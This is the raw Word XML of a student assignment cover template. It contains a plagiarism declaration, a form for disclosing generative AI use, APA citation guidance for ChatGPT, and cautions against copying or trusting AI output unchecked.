    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="38D9DCFD" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I/We am/are the originator(s) of this work and I/We have appropriately acknowledged all other original sources used as my/our references for this work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="18FF972E" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="20576BD9" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I/We understand that Plagiarism is the act of taking and using the whole or any part of another person’s work, including work generated by AI, and presenting it as my/our own.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="54D116C8" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="7463E446" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I/We understand that Plagiarism is an academic offence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="373947AB" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and if I/We am/are found to have committed or abetted the offence of plagiarism in relation to this submitted work, disciplinary action will be enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="2B7F36E0" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="4A68FB5A" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Declaration on the use of Generative AI tools for assignments</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="215"/>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529"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidTr="000402B3" w14:paraId="7325C20A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="387F8C94" w14:textId="77777777">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="360"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="1040DE4A" w14:textId="77777777">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="360"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Describe how you have used Generative AI tools such as ChatGPT or Dall.E-2 in your assignment. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="239C6C2A" w14:textId="77777777">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="360"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="42EE5256" w14:textId="77777777">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="360"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Show snapshots of the conversations with the AI tool (i.e., the prompts you used and the response you get from the AI tool).  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="4BD9873B" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidTr="000402B3" w14:paraId="45030063" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="0A91F126" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="1BDCE77E" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="04A99874" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="794A5F25" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="353119CF" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="37B7EE58" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="263F7F23" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="6CFD1B08" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidTr="000402B3" w14:paraId="5F316B7C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="1F32A0D2" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="74505D5F" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>How do you indicate the reference?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="4A1AF17C" w14:textId="77777777">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:after="150"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>The content generated by AI tools are not retrievable except by the user who generated them, so they are considered non-recoverable sources. Although non-recoverable data or quotations in APA Style papers are usually cited as personal communications, with ChatGPT-generated text there is no person communicating. Quoting text from ChatGPT chat is therefore more like sharing the output of an algorithm, with a reference list entry and the corresponding in-text citation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="06AEF226" w14:textId="77777777">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:after="150"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="008C55F4" w14:textId="77777777">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="360"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>According to the official APA Style site, ChatGPT references should be cited as:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="22CA2352" w14:textId="77777777">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="360"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="3FB9C4AD" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">E.g.   OpenAI. (2023). </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ChatGPT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Sep 25 version) [Large language model].       </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="54BAF58E" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:hyperlink w:history="1" r:id="rId12">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                </w:rPr>
                <w:t>https://chat.openai.com/chat</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidRDefault="000402B3" w14:paraId="236B1C82" w14:textId="77777777">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="360"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="05F56019" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="31744FB6" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="5622CE89" w14:textId="77777777">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="105A3A4F" w14:textId="77777777">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="707BA8AF" w14:textId="77777777">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="00E41785" w:rsidRDefault="000402B3" w14:paraId="5303466C" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:adjustRightInd/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not copy answers produced by the AI tool in totality as it is considered as plagiarism.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="3FB17906" w14:textId="77777777">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="00E41785" w:rsidRDefault="000402B3" w14:paraId="167CA237" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:adjustRightInd/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not rely on any information produced by the AI tool blindly. You should always verify the answer with other sources. Do not assume that these answers provided by the AI tool are correct.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="4667D2F3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="00E41785" w:rsidRDefault="000402B3" w14:paraId="18148C3F" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:adjustRightInd/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">To achieve quality outputs from the AI tool, you should provide good prompt that is clear and specific. Be precise and provide context.  Avoid asking open-ended questions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="675509CD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="indendtedpara"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3118"/>
          <w:tab w:val="right" w:pos="9354"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:spacing w:val="15"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="4465F129" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="indendtedpara"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3118"/>
          <w:tab w:val="right" w:pos="9354"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:spacing w:val="15"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00436E94" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="6B748238" w14:textId="7B1AC799">
      <w:pPr>
        <w:pStyle w:val="indendtedpara"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3118"/>
          <w:tab w:val="right" w:pos="9354"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:spacing w:val="15"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:smallCaps/>
          <w:spacing w:val="15"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Name and Signature of student: Member 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00346F54" w:rsidP="000402B3" w:rsidRDefault="00CF1D71" w14:paraId="1A5C115A" w14:textId="41D34814">
      <w:pPr>
        <w:pStyle w:val="indendtedpara"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3118"/>
          <w:tab w:val="right" w:pos="9354"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
